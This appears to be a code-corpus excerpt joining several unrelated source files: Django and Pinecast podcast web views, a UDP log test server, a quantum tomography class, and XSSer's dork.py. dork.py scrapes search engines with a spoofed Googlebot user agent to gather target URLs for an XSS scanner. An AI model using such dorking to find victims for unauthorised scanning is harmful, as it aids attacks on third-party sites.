from django.views.decorators.csrf import csrf_protect
from localtv.admin import forms
from localtv.decorators import require_site_admin
from localtv.models import SiteSettings
@require_site_admin
@csrf_protect
def index(request):
headers = [
{'label': 'Page Name'},
{'label': 'URL'}]
site_settings = SiteSettings.objects.get_current()
flatpages = FlatPage.objects.filter(sites=site_settings.site)
formset = forms.FlatPageFormSet(queryset=flatpages)
form = forms.FlatPageForm()
if request.method == 'GET':
return render_to_response('localtv/admin/flatpages.html',
{'formset': formset,
'form': form,
'headers': headers},
context_instance=RequestContext(request))
else:
if request.POST.get('submit') == 'Add':
form = forms.FlatPageForm(request.POST)
if form.is_valid():
flatpage = form.save()
flatpage.sites.add(site_settings.site)
return HttpResponseRedirect(request.path + '?successful')
return render_to_response('localtv/admin/flatpages.html',
{'formset': formset,
'form': form,
'headers': headers},
context_instance=RequestContext(request))
else:
formset = forms.FlatPageFormSet(request.POST,
queryset=flatpages)
if formset.is_valid():
formset.save()
action = request.POST.get('bulk_action')
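                # Bulk actions apply only to rows whose BULK checkbox was ticked.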
if action == 'delete':
for data in formset.cleaned_data:
if data['BULK']:
data['id'].delete()
return HttpResponseRedirect(request.path + '?successful')
else:
return render_to_response(
'localtv/admin/flatpages.html',
{'formset': formset,
'form': form,
'headers': headers},
context_instance=RequestContext(request))
| agpl-3.0 | 6,873,660,476,525,704,000 | 40.383333 | 79 | 0.530407 | false | 5.162162 | false | false | false |
mpihlak/pg_logforward | testing/test_logserver.py | 1 | 1769 | #!/usr/bin/env python
import sys, SocketServer
class JSONLogServer(SocketServer.BaseRequestHandler):
"""
	Sample UDP server for receiving JSON, netstring and syslog log messages.
"""
def handle_json(self, data):
try:
import json
msg = json.loads(data)
print("parsed json message:")
for k in msg.keys():
print(" %s: %s" % (k, msg[k]))
print
except Exception, e:
print("json parsing error: %s" % e)
def handle_netstr(self, data):
try:
import netstring
decoder = netstring.Decoder()
keys = [ "username", "database", "remotehost", "debug_query_string", "elevel",
"funcname", "sqlerrcode", "message", "detail", "hint", "context ",
"instance_label", "timestamp" ]
pos = 0
for field in decoder.feed(data):
if pos < len(keys):
k = keys[pos]
print(" %s: %s" % (k, field))
pos += 1
except Exception, e:
print("netstr parsing error: %s" % e)
def handle_syslog(self, data):
pass
def handle(self):
data = self.request[0].strip()
print("raw message: %s" % data)
if not data:
return
if data.startswith("{"):
self.handle_json(data)
elif data[0].isdigit():
self.handle_netstr(data)
elif data[0] == '<':
self.handle_syslog(data)
if __name__ == "__main__":
if len(sys.argv) < 2:
PORT = 23456
else:
PORT = int(sys.argv[1])
HOST = ""
print("Listening on %s:%s" % (HOST, PORT))
server = SocketServer.UDPServer((HOST, PORT), JSONLogServer)
server.serve_forever()
| bsd-2-clause | 1,712,845,533,709,028,900 | 26.640625 | 90 | 0.504805 | false | 3.887912 | false | false | false |
AlmostBetterNetwork/pinecast | podcasts/views.py | 1 | 18321 | import datetime
import time
from email.utils import formatdate, parsedate
from xml.sax.saxutils import escape, quoteattr
from django.conf import settings
from django.http import Http404, HttpResponse, HttpResponseNotAllowed, HttpResponseNotModified, StreamingHttpResponse
from django.shortcuts import redirect
from django.views.decorators.cache import cache_control, never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.gzip import gzip_page
from django.views.decorators.http import require_POST
import accounts.payment_plans as plans
import analytics.log as analytics_log
from .models import Podcast, PodcastEpisode, PodcastSlugMigration
from accounts.models import UserSettings
from analytics.analyze import get_request_ip
from payments.models import RecurringTip
from pinecast.helpers import get_object_or_404, json_response, render, reverse
from pinecast.signatures import signer
DEFAULT_EPISODE_PREFIX = 'S{season}E{episode} - '
VALID_SOURCES = ['direct', 'rss', 'jsonfeed', 'embed']
@never_cache
def listen(req, episode_id):
ep = get_object_or_404(PodcastEpisode, id=episode_id)
source = req.GET.get('source', 'direct')
if source in VALID_SOURCES:
listen = analytics_log.get_listen_obj(
ep=ep,
source=source,
req=req,
ip=get_request_ip(req),
ua=req.META.get('HTTP_USER_AGENT', 'Unknown'),
timestamp=datetime.datetime.now(),
)
analytics_log.commit_listens([listen])
return redirect(ep.get_raw_url())
def feed(req, podcast_slug):
pod, redirect = _get_pod_or_redirect(podcast_slug)
if redirect:
return redirect
episodes = pod.get_episodes(select_related=('audio', 'artwork', 'episodefeedbackprompt'))
# Write the log of this to the analytics back-end(s)
analytics_log.write_subscription(req, pod, is_private=False)
caching_response = _handle_caching(req, pod, episodes)
if caching_response:
return caching_response
return _gen_feed(req, pod, episodes)
def feed_private(req, podcast_slug, subscriber):
try:
sm = PodcastSlugMigration.objects.select_related('podcast').get(migrate_from=podcast_slug)
return redirect(reverse('feed_private', podcast_slug=sm.podcast.slug, subscriber=subscriber))
except PodcastSlugMigration.DoesNotExist:
pass
pod = get_object_or_404(Podcast, slug=podcast_slug)
recurring_tip = get_object_or_404(RecurringTip, podcast=pod, tipper__uuid=subscriber, deactivated=False)
setattr(recurring_tip, 'podcast', pod) # ✨magic optimization ✨
if not recurring_tip.eligible_to_access_private():
raise Http404()
episodes = pod.get_episodes(include_private=True)
# Write the log of this to the analytics back-end(s)
analytics_log.write_subscription(req, pod, is_private=True)
caching_response = _handle_caching(req, pod, episodes)
if caching_response:
return caching_response
return _gen_feed(req, pod, episodes, is_private=True)
if settings.FEED_GZIP:
feed = gzip_page(feed)
feed_private = gzip_page(feed_private)
def _get_pod_or_redirect(slug):
try:
sm = PodcastSlugMigration.objects.select_related('podcast').get(migrate_from=slug)
return None, redirect(reverse('feed', podcast_slug=sm.podcast.slug))
except PodcastSlugMigration.DoesNotExist:
pass
return get_object_or_404(Podcast.objects.select_related('cover_art', 'owner', 'site'), slug=slug), None
def _handle_caching(req, pod, episodes):
if req.method not in ('GET', 'HEAD'):
return HttpResponseNotAllowed(permitted_methods=['GET', 'HEAD'])
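    # pod.last_feed_update is passed twice so max() still has two arguments when episodes is empty.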
last_update = max(pod.last_feed_update, pod.last_feed_update, *[e.publish for e in episodes])
last_update = last_update - datetime.timedelta(microseconds=last_update.microsecond)
expected_etag = last_update.isoformat()
match_etag = req.META.get('HTTP_IF_NONE_MATCH')
if match_etag:
if match_etag.strip('"') == expected_etag:
return HttpResponseNotModified()
elif settings.DEBUG:
print('Expected "{}" to match "{}"'.format(match_etag, expected_etag))
now = datetime.datetime.now()
ims = req.META.get('HTTP_IF_MODIFIED_SINCE')
if ims:
try:
ims_parsed = datetime.datetime(*parsedate(ims)[:6])
if ims_parsed >= last_update:
return HttpResponseNotModified()
elif settings.DEBUG:
print(ims_parsed, last_update)
except Exception as e:
if settings.DEBUG:
print(e)
return None
def _gen_feed(req, pod, episodes, is_private=False):
start_time = datetime.datetime.now()
items = []
is_demo = UserSettings.get_from_user(pod.owner).plan == plans.PLAN_DEMO
channel_explicit_tag = '<itunes:explicit>%s</itunes:explicit>' % ('yes' if pod.is_explicit else 'no')
if not isinstance(episodes, list):
episodes = list(episodes)
pod_is_serial = pod.episode_release_type == 'serial'
# `1, 1,` because if there are no episodes, you'll get an `int object is not iterable` error
newest_season = max(1, 1, *[x.season for x in episodes if x.season])
episodes_by_season = {}
for ep in episodes:
if not ep.season:
continue
season_set = episodes_by_season.setdefault(ep.season, set())
if not ep.season_episode:
continue
season_set.add(ep.season_episode)
episodes_by_season.setdefault(newest_season, set()) # For empty podcasts
episodes_without_nums_by_season = {
season: sum(1 for e in episodes if (e.season == season or not e.season) and not e.season_episode) for
season in episodes_by_season
}
episode_prefix = pod.serial_ep_prefix_format or DEFAULT_EPISODE_PREFIX
# TODO: Make the database do this with `values()`?
categories = sorted([c.category for c in pod.podcastcategory_set.all()], key=lambda c: len(c))
category_map = {}
for cat in categories:
spl = cat.split('/')
cursor = category_map
for i in spl:
cursor.setdefault(i, {})
cursor = cursor[i]
def render_cat(c):
for k, v in c.items():
if not v:
yield '<itunes:category text=%s />' % quoteattr(k)
else:
yield (
'<itunes:category text={cat}>{inner}</itunes:category>'
.format(cat=quoteattr(k), inner='\n'.join(render_cat(v)))
)
def generate_item(ep):
ep_url = ep.get_url('rss')
md_desc = ep.get_html_description(is_demo=is_demo)
title = ep.title
if pod_is_serial and ep.episode_type == 'full' and ep.season and ep.season_episode:
title = episode_prefix.format(season=ep.season, episode=ep.season_episode)[:256] + title
season = ep.season if ep.season else newest_season
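        # Episodes without an explicit number are assigned numbers counting down
        # from the top of the season, skipping any numbers already taken.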
if ep.season_episode:
season_episode = str(ep.season_episode)
elif ep.episode_type != 'full':
season_episode = 1
else:
season_episode = episodes_without_nums_by_season[season] + len(episodes_by_season[season])
while season_episode in episodes_by_season[season]:
season_episode -= 1
episodes_by_season[season].add(season_episode)
episodes_without_nums_by_season[season] -= 1
season = str(season)
season_episode = str(season_episode)
yield (
'<item>'
'<title>{title}</title>'
'<description><![CDATA[{desc}]]></description>'
'<link>{url}</link>'
'<guid isPermaLink="false">{guid}</guid>'
'<pubDate>{publish}</pubDate>'
'<itunes:author>{author}</itunes:author>'
'<itunes:subtitle>{subtitle}</itunes:subtitle>'
'<itunes:image href={artwork} />'
'<itunes:duration>{duration}</itunes:duration>'.format(
title=escape(title),
desc=md_desc,
url=escape(ep.get_site_url() or ep_url),
guid=escape(ep.get_guid()),
publish=formatdate(time.mktime(ep.publish.timetuple())),
author=escape(pod.author_name),
subtitle=escape(ep.subtitle),
artwork=quoteattr(ep.get_image_url()),
duration=escape(ep.formatted_duration()),
)
)
if title != ep.title:
yield '<itunes:title>%s</itunes:title>' % escape(ep.title)
if ep.explicit_override != PodcastEpisode.EXPLICIT_OVERRIDE_CHOICE_NONE:
yield '<itunes:explicit>%s</itunes:explicit>' % (
'yes' if ep.explicit_override == PodcastEpisode.EXPLICIT_OVERRIDE_CHOICE_EXPLICIT else 'clean')
else:
yield channel_explicit_tag
if ep.audio:
yield '<enclosure url=%s length=%s type=%s />' % (
quoteattr(ep_url),
quoteattr(str(ep.audio.content_size)),
quoteattr(ep.audio.content_type)
)
if ep.episode_type != 'full':
yield '<itunes:episodeType>%s</itunes:episodeType>' % escape(ep.episode_type)
if pod_is_serial:
yield '<itunes:season>%s</itunes:season>' % escape(season)
if pod_is_serial and ep.episode_type == 'full':
yield '<itunes:episode>%s</itunes:episode>' % escape(season_episode)
if ep.copyright:
yield '<dc:copyright>%s</dc:copyright>' % escape(ep.copyright)
if ep.license:
yield '<dc:rights>%s</dc:rights>' % escape(ep.license)
yield '</item>'
def generate_content():
yield (
'<?xml version="1.0" encoding="UTF-8"?>\n'
'<?xml-stylesheet type="text/xsl" media="screen" href="/static/rss.xsl"?>\n'
'<rss xmlns:atom="http://www.w3.org/2005/Atom"\n'
' xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"\n'
' xmlns:dc="http://purl.org/dc/elements/1.1/"\n'
' xmlns:pinecast="https://pinecast.com/rss-dtd/1.0/"\n'
' version="2.0">\n'
'<channel>\n'
'<title>{title}</title>\n'
'<link>{homepage}</link>\n'
'<atom:link href="{canonical}" rel="self" type="application/rss+xml" />\n'
'<generator>Pinecast (https://pinecast.com)</generator>\n'
'{pinecast_site}'
'<language>{language}</language>'.format(
title=escape(pod.name),
homepage=escape(pod.homepage),
canonical=escape(pod.canonical_feed_url()),
language=escape(pod.language),
pinecast_site=(
'<pinecast:site>{}</pinecast:site>\n'.format(pod.get_site().get_domain()) if
pod.get_site() else
''
),
)
)
if pod.copyright:
yield '<copyright>%s</copyright>' % escape(pod.copyright)
if pod.episode_release_type != 'episodic':
yield '<itunes:type>%s</itunes:type>' % escape(pod.episode_release_type)
if pod.rss_redirect:
yield '<itunes:new-feed-url>%s</itunes:new-feed-url>' % escape(pod.canonical_feed_url())
if pod.subtitle:
yield '<itunes:subtitle>%s</itunes:subtitle>' % escape(pod.subtitle)
yield (
'<itunes:author>{author}</itunes:author>\n'
'<description><![CDATA[{description}]]></description>\n'
'<itunes:owner>\n'
'<itunes:name>{author_name}</itunes:name>\n'
'<itunes:email>{owner_email}</itunes:email>\n'
'</itunes:owner>\n'
'{channel_explicit_tag}\n'
'<itunes:image href={cover_art_attr} />\n'
'<image>\n'
'<title>{title}</title>\n'
'<link>{homepage}</link>\n'
'<url>{cover_art}</url>\n'
'</image>'.format(
author=escape(pod.author_name),
description=pod.description,
author_name=escape(pod.author_name),
owner_email=escape(pod.owner.email),
channel_explicit_tag=channel_explicit_tag,
cover_art_attr=quoteattr(pod.get_cover_image_url()),
cover_art=escape(pod.get_cover_image_url()),
title=escape(pod.name),
homepage=escape(pod.homepage),
)
)
yield '\n'.join(render_cat(category_map))
for ep in episodes:
if settings.FEED_STREAMING:
yield '\n'.join(generate_item(ep))
else:
yield from generate_item(ep)
yield '</channel>\n</rss>'
if UserSettings.get_from_user(pod.owner).plan == plans.PLAN_DEMO:
if len(episodes) > 10:
yield '<!-- This feed is truncated because the owner is not a paid customer. -->'
else:
yield '<!-- This feed will be truncated at 10 items because the owner is not a paid customer. -->'
end_time = datetime.datetime.now()
delta = end_time - start_time
yield '<!-- generated in {}s {}us -->'.format(delta.seconds, delta.microseconds)
if settings.DEBUG_TOOLBAR:
yield '</body>'
if pod.rss_redirect:
resp = HttpResponse(status=301)
resp.setdefault('Location', pod.rss_redirect)
return resp
user_agent = req.META.get('HTTP_USER_AGENT', '')
if settings.DEBUG_TOOLBAR:
content_type = 'text/html'
else:
content_type = 'text/xml' if user_agent.startswith('Mozilla') else 'application/rss+xml'
content_type_with_encoding = content_type + '; charset=utf-8'
if settings.FEED_STREAMING:
resp = StreamingHttpResponse(
(c + '\n' for c in generate_content()),
content_type=content_type_with_encoding,
status=200,
)
else:
resp = HttpResponse(
'\n'.join(generate_content()),
content_type=content_type_with_encoding,
status=200,
)
# Get the estimated last update timestamp
last_update = max(pod.last_feed_update, pod.last_feed_update, *[e.publish for e in episodes])
# Shave off the microsecond component
last_update = last_update - datetime.timedelta(microseconds=last_update.microsecond)
resp.setdefault('ETag', 'W/"{}"'.format(last_update.isoformat()))
resp.setdefault('Last-Modified', formatdate(time.mktime(last_update.timetuple())))
resp.setdefault('Access-Control-Allow-Origin', '*')
resp.setdefault('Access-Control-Request-Method', 'GET')
return resp
@gzip_page
@json_response(cors=True)
def json_feed(req, podcast_slug):
pod, redirect = _get_pod_or_redirect(podcast_slug)
if redirect:
return redirect
is_demo = UserSettings.get_from_user(pod.owner).plan == plans.PLAN_DEMO
pod_is_serial = pod.episode_release_type == 'serial'
episode_prefix = pod.serial_ep_prefix_format or DEFAULT_EPISODE_PREFIX
episodes = pod.get_episodes()
out = {
'version': 'https://jsonfeed.org/version/1',
'title': pod.name,
'description': pod.description,
'icon': pod.get_cover_image_url(),
'author': {'name': pod.author_name},
'feed_url': pod.canonical_feed_url(),
'items': [
{
'id': str(ep.id),
'url': ep.get_site_url() or ep.get_url('jsonfeed'),
'title': (
episode_prefix.format(season=ep.season, episode=ep.season_episode) + ep.title if
pod_is_serial and ep.episode_type == 'full' and ep.season and ep.season_episode else
ep.title
),
'content_html': ep.get_html_description(is_demo=is_demo),
'image': ep.get_image_url(),
'date_published': ep.publish.strftime('%Y-%m-%dT%H:%M:%SZ'),
'attachments': [
{
'url': ep.get_url('jsonfeed'),
'mime_type': ep.audio.content_type,
'size_in_bytes': ep.audio.content_size,
'duration_in_seconds': ep.duration,
},
],
} for
ep in
episodes
]
}
if pod.homepage:
out['home_page_url'] = pod.homepage
return out
PLAYER_THEMES = set(['minimal', 'thick', 'slim'])
@gzip_page
@cache_control(public=True, max_age=3600)
def player(req, episode_id):
ep = get_object_or_404(PodcastEpisode.objects.select_related('audio', 'artwork'), id=episode_id)
pod = get_object_or_404(Podcast.objects.select_related('owner'), id=ep.podcast_id)
setattr(ep, 'podcast', pod)
    if ep.check_is_private() and (not req.user or req.user.id != pod.owner_id):  # compare ids; comparing an int to a User object was always unequal
raise Http404()
theme = 'minimal'
if req.GET.get('theme') in PLAYER_THEMES:
theme = req.GET.get('theme')
ctx = {'episode': ep}
if req.GET.get('card'):
ctx['card'] = True
resp = render(req, 'player/%s.html' % theme, ctx)
# If the user is not a demo user, allow the player to be used outside the app.
if UserSettings.user_meets_plan(ep.podcast.owner, plans.FEATURE_MIN_PLAYER):
resp.xframe_options_exempt = True
return resp
@gzip_page
@cache_control(public=True, max_age=3600)
def player_latest(req, podcast_slug):
pod = get_object_or_404(Podcast, slug__iexact=podcast_slug)
eps = pod.get_episodes()
if not eps:
raise Http404()
url = reverse('player', episode_id=str(eps[0].id))
theme = req.GET.get('theme', 'minimal')
return redirect(url + '?theme={}'.format(theme))
@csrf_exempt
@require_POST
def update_duration(req):
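    # The episode id arrives as a signed token minted by the player, so only
    # recently issued links (max_age=3600) may update an episode's duration.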
try:
ep_id = signer.unsign(req.POST.get('ep_id', ''), max_age=3600).decode('utf-8')
except Exception as e:
return HttpResponse(status=400)
ep = get_object_or_404(PodcastEpisode, id=ep_id)
try:
ep.duration = int(float(req.POST.get('duration', '0')))
except Exception as e:
return HttpResponse(status=400)
ep.save()
return HttpResponse(status=204)
| apache-2.0 | -478,698,706,499,665,860 | 37.562105 | 117 | 0.595349 | false | 3.669271 | false | false | false |
xujun10110/golismero | tools/xsser/XSSer/dork.py | 7 | 13363 | #!/usr/bin/python
# -*- coding: iso-8859-15 -*-
"""
$Id$
This file is part of the xsser project, http://xsser.sourceforge.net.
Copyright (c) 2011/2012 psy <[email protected]> - <[email protected]>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 3 of the License.
xsser is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import urlparse
import urllib2
import traceback
urllib2.socket.setdefaulttimeout(5.0)
from BeautifulSoup import BeautifulSoup
DEBUG = 1
class Dorker(object):
def __init__(self, engine='bing'):
self._engine = engine
def dork(self, search):
"""
Perform a search and return links.
        Uses the 'bing' engine by default.
(http://en.wikipedia.org/wiki/List_of_search_engines)
"""
urlpar = None
divid = None
unpack_func = None
css_class = None
raw_extract = None
html_tok = 'a'
paging_arg = None # allow to do paging
if self._engine == 'bing' or not self._engine: # works at 20-02-2011
search_url = "http://www.bing.com/search?q=" + urllib2.quote(search)
divid = 'results_container'
elif self._engine == 'scroogle':
search_url = "http://www.scroogle.org/cgi-bin/nbbw.cgi?q=" + urllib2.quote(search)
elif self._engine == 'altavista': # works at 20-02-2011
def altavista_func(href):
href = href['href']
# http://search.yahoo.com/r/_ylt=A0oG7p45zGBNl0MAuhQPxQt.;_ylu=X3oDMTByMTNuNTZzBHNlYwNzcgRwb3MDMgRjb2xvA2FjMgR2dGlkAw--/SIG=11942um5m/EXP=1298275769/**http%3a//money.cnn.com/
if "**" in href:
return {'href':urlparse.unquote(href[href.rfind('**')+2:])}
#divid = 'results' -> in other altavista=?
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if "<a class='res'" in line and "http" in line:
href = line[line.find("http"):line.rfind("'")]
results.append({'href': href})
return results
css_class = 'res'
#unpack_func = altavista_func -> in otherS?
#search_url = "http://us.yhs4.search.yahoo.com/yhs/search?fr=altavista&itag=ody&q=" + urllib2.quote(search)
search_url = "http://es.altavista.com/web/results?fr=altavista&itag=ody&q=" + urllib2.quote(search)
elif self._engine == 'duck': # seems hopeless at 20-02-2011
search_url = "https://duckduckgo.com/?q=" + urllib2.quote(search)
elif self._engine == 'baidu': # works at 20-02-2011
#html_tok = 'span'
#css_class = 'g'
def raw_extract(html_data, encoding):
results = []
pos = 0
while pos < len(html_data):
pos = html_data.find('span class="g">', pos)
if pos == -1:
break;
href = html_data[pos+15:html_data.find('<', pos)].strip()
pos = pos + 1
if not href:
continue
href = href.split(" ")[0]
if not href.startswith('http'):
href = 'http://'+href
results.append({'href': href})
return results
search_url = "http://www.baidu.com/s?wd=" + urllib2.quote(search)
elif self._engine == 'yandex': # works at 20-02-2011
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if 'class="b-serp-url__link"' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
return results
#css_class = 'b-serp-url__link'
search_url = "http://yandex.ru/yandsearch?text=" + urllib2.quote(search)
elif self._engine == 'yebol':
divid = "Scrollbar-SearchResultsc"
search_url = "http://www.yebol.com/a.jsp?x=0&y=0&key=" + urllib2.quote(search)
elif self._engine == 'youdao':
search_url = "http://www.youdao.com/search?q=" + urllib2.quote(search)
#elif self._engine == 'ask': # not works
# def raw_extract(html_data, encoding):
# results = []
# prevline = ""
# for line in html_data.split("\n"):
# if 'class="title txt_lg"' in line and "http" in prevline:
# href = prevline[prevline.find("http"):prevline.find('"',
# prevline.find("http")+10)]
# results.append({'href': href})
# prevline = line
# return results
# search_url = "http://www.ask.com/web?q=" + urllib2.quote(search)
elif self._engine == 'google': # works at 11/11/2011
#def raw_extract(html_data, encoding):
# results = []
# prevline = ""
# for line in html_data.split("\n"):
# if 'class="r"' in line and "http" in prevline:
# href = prevline[prevline.find("http"):prevline.find('"',
# prevline.find("http")+10)]
# results.append({'href': href})
# prevline = line
# return results
search_url = "https://encrypted.google.com/search?hl=en&q=" + urllib2.quote(search)
elif self._engine == 'yahoo': # works at 20-02-2011
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if 'class="yschttl spt"' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
return results
search_url = "http://search.yahoo.com/search?p=" + urllib2.quote(search)
elif self._engine == 'sogou':
search_url = "http://www.sogou.com/web?query=" + urllib2.quote(search)
elif self._engine == 'rediff':
search_url = "http://search1.rediff.com/dirsrch/default.asp?src=web&MT=" + urllib2.quote(search)
elif self._engine == 'blekko':
search_url = "http://blekko.com/ws/?q=" + urllib2.quote(search)
elif self._engine == 'kosmix': # doesnt work properly
def raw_extract(html_data, encoding):
print html_data
results = []
is_next = False
for line in html_data.split("\n"):
#if 'class="www_result_url"' in line and "http" in line:
if '<h4>' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
is_next=False
if is_next and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
is_next=False
elif '<h4>' in line:
is_next=True
else:
is_next=False
return results
search_url = "http://www.kosmix.com/topic/lala?q=" + urllib2.quote(search)
elif self._engine == 'search': # works at 20-02-2011
def raw_extract(html_data, encoding):
results = []
for line in html_data.split("\n"):
if 'class="www_result_url"' in line and "http" in line:
#if 'class="www_result_title"' in line and "http" in line:
href = line[line.find("http"):line.find('"', line.find("http")+10)]
results.append({'href': href})
return results
search_url = "http://www.search.ch/?q=" + urllib2.quote(search)
elif self._engine == 'ifacnet':
search_url = "http://www.ifacnet.com/?q=" + urllib2.quote(search)
elif self._engine == 'bussines':
search_url = "http://www.business.com/search/rslt_default.asp?vt=all&type=web&query=" + urllib2.quote(search)
elif self._engine == 'globalspec':
search_url = "http://search.globalspec.com/Search?query=" + urllib2.quote(search)
elif self._engine == 'taptu':
search_url = "http://www.taptu.com/search/lite/results?term=" + urllib2.quote(search)
elif self._engine == 'topix':
search_url = "http://www.topix.com/search/article?q=" + urllib2.quote(search)
elif self._engine == 'hakia':
search_url = "http://hakia.com/search?q=" + urllib2.quote(search)
elif self._engine == 'leapfish':
search_url = "http://www.leapfish.com/web.aspx?q=" + urllib2.quote(search)
#elif self._engine == 'webcrawler': # works at 20-02-2011
# urlpar = "rawURL"
# search_url = "http://www.webcrawler.com/webcrawler203/ws/results/Web/" + urllib2.quote(search) + "/1/417/TopNavigation/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true"
elif self._engine == 'excite':
search_url = "http://msxml.excite.com/excite/ws/results/Web/" + urllib2.quote(search) + "/1/0/0/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true"
elif self._engine == 'yolink':
search_url = "http://cloud.yolink.com/search/search?keywords=" + urllib2.quote(search)
elif self._engine == 'lycos':
search_url = "http://search.lycos.com/?tab=web&query=" + urllib2.quote(search)
        else:
            print "\nThis search engine is not allowed. Check dork.py file to see a complete list\n"
            return []
try:
self.search_url = search_url
url = urllib2.urlopen(urllib2.Request(search_url,
headers={'User-Agent':
"Googlebot/2.1 (+http://www.google.com/bot.html"}))
except urllib2.URLError, e:
if DEBUG:
traceback.print_exc()
raise Exception("Internal error dorking: " + e.message)
html_data = url.read()
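        # Normalize sloppy markup before parsing so BeautifulSoup doesn't choke.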
html_data = html_data.replace(">",">\n")
html_data = html_data.replace("target=_",'target="_')
html_data = html_data.replace('\ >','/>')
html_data = html_data.replace('\>','/>')
html_data = html_data.replace('"">','">')
html_data = html_data.replace('</scr"+"ipt>','</script>')
content_type = url.headers['content-type']
try:
encoding = content_type.split(";")[1].split("=")[1].strip()
except:
encoding = 'utf-8'
if raw_extract:
links = raw_extract(html_data, encoding)
else:
try:
soup = BeautifulSoup(html_data, fromEncoding=encoding)
except Exception, e:
traceback.print_exc()
raise Exception("Internal error dorking:" + e.message)
if divid:
#print(html_data)
soup = soup.find('div', {'id':divid})
if css_class:
links = soup.findAll(html_tok, {'class':css_class})
else:
links = soup.findAll(html_tok)
found_links = []
if unpack_func:
links = map(unpack_func, links)
links = filter(lambda s: s, links)
for link in links:
try:
href = str(link['href'].encode('utf-8'))
except KeyError:
# this link has no href
pass
else:
if not href.startswith("/") and not "microsofttranslator" in href and not "bingj" in href and not "live.com" in href and not "scroogle" in href:
if urlpar:
parsed = urlparse.urlparse(href)
q = urlparse.parse_qs(parsed.query)
if urlpar in q and q[urlpar]:
href = urlparse.unquote(q[urlpar][0])
found_links.append(href)
else:
found_links.append(href)
return found_links
if __name__ == '__main__':
for a in ['google', 'altavista', 'yahoo', 'baidu', 'bing', 'webcrawler',
'youdao', 'yandex']:
dork = Dorker(a)
res = dork.dork("lorea")
print a,len(res)
for b in res:
print " *", b
| gpl-2.0 | 8,629,160,586,795,557,000 | 47.948718 | 190 | 0.517099 | false | 3.764225 | false | false | false |
ooovector/qtlab_replacement | tomography.py | 1 | 2105 | from . import data_reduce
import numpy as np
from . import readout_classifier
#import cvxopt
#import cvxpy
class tomography:
def __init__(self, sz_measurer, pulse_generator, proj_seq, reconstruction_basis={}):
self.sz_measurer = sz_measurer
#self.adc = adc
self.pulse_generator = pulse_generator
self.proj_seq = proj_seq
self.reconstruction_basis=reconstruction_basis
self.adc_reducer = data_reduce.data_reduce(self.sz_measurer.adc)
self.adc_reducer.filters['SZ'] = {k:v for k,v in self.sz_measurer.filter_binary.items()}
self.adc_reducer.filters['SZ']['filter'] = lambda x: 1-2*self.sz_measurer.filter_binary_func(x)
def get_points(self):
points = { p:{} for p in self.proj_seq.keys() }
points.update({p:{} for p in self.reconstruction_basis.keys()})
return points
def get_dtype(self):
dtypes = { p:float for p in self.proj_seq.keys() }
dtypes.update({ p:float for p in self.reconstruction_basis.keys() })
return dtypes
def set_prepare_seq(self, seq):
self.prepare_seq = seq
def measure(self):
meas = {}
for p in self.proj_seq.keys():
self.pulse_generator.set_seq(self.prepare_seq+self.proj_seq[p]['pulses'])
meas[p] = np.real(np.mean(self.adc_reducer.measure()['SZ'])/2)
proj_names = self.proj_seq.keys()
basis_axes_names = self.reconstruction_basis.keys()
#TODO: fix this norm stuff in accordance with theory
basis_vector_norms = np.asarray([np.linalg.norm(self.reconstruction_basis[r]['operator']) for r in basis_axes_names])
if len(self.reconstruction_basis.keys()):
reconstruction_matrix = np.real(np.asarray([[np.sum(self.proj_seq[p]['operator']*np.conj(self.reconstruction_basis[r]['operator'])) \
for r in basis_axes_names] \
for p in proj_names]))
projections = np.linalg.lstsq(reconstruction_matrix, [meas[p] for p in proj_names])[0]*(basis_vector_norms**2)
meas.update({k:v for k,v in zip(basis_axes_names, projections)})
return meas
def get_opts(self):
opts = { p:{} for p in self.proj_seq.keys()}
opts.update ({ p:{} for p in self.reconstruction_basis.keys()})
return opts
| gpl-3.0 | 7,328,445,836,942,787,000 | 36.607143 | 136 | 0.690261 | false | 2.891484 | false | false | false |